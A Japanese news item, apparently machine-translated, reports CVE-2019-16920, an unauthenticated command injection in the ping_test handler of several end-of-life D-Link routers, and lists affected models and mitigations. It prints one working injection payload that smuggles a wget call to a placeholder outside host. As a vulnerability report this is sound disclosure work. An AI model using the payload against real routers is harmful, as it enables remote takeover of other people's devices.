D-Linkルーターにリモートから悪用可能な脆弱性

D-Link 無線ルーターの場合 特定された 危険な脆弱性 (CVE-2019–16920)、認証なしでアクセスできる「ping_test」ハンドラーに特別なリクエストを送信することで、デバイス側でコードをリモートで実行できるようになります。

興味深いことに、ファームウェア開発者によれば、「ping_test」呼び出しは認証後にのみ実行されるべきですが、実際には、Web インターフェイスへのログインに関係なく、どのような場合でも呼び出されます。 特に、apply_sec.cgi スクリプトにアクセスして「action=ping_test」パラメータを渡すと、スクリプトは認証ページにリダイレクトされますが、同時に ping_test に関連付けられたアクションを実行します。 コードを実行するには、ping_test 自体に別の脆弱性が使用され、テストのために送信された IP アドレスの正確性を適切にチェックせずに ping ユーティリティを呼び出します。 たとえば、wget ユーティリティを呼び出して「echo 1234」コマンドの結果を外部ホストに転送するには、パラメータ「ping_ipaddr=127.0.0.1%0awget%20-P%20/tmp/%20http://」を指定するだけです。 test.test/?$( echo 1234)」。

D-Linkルーターにリモートから悪用可能な脆弱性

この脆弱性の存在は以下の機種で正式に確認されています。

  • DIR-655 ファームウェア 3.02b05 以降。
  • DIR-866L ファームウェア 1.03b04 以降。
  • DIR-1565 ファームウェア 1.01 以降。
  • DIR-652 (問題のあるファームウェアのバージョンに関する情報は提供されません)

これらのモデルはサポート期間が終了しているため、D-Link 彼は述べましたは、脆弱性を解消するためのアップデートをリリースしないため、それらの使用を推奨しておらず、新しいデバイスに置き換えることを推奨しています。 セキュリティの回避策として、Web インターフェイスへのアクセスを信頼できる IP アドレスのみに制限できます。

その後、この脆弱性も判明しました 影響を与える モデル DIR-855L、DAP-1533、DIR-862L、DIR-615、DIR-835、DIR-825 のアップデートのリリース予定はまだ不明です。

出所: オープンネット.ru

コメントを追加します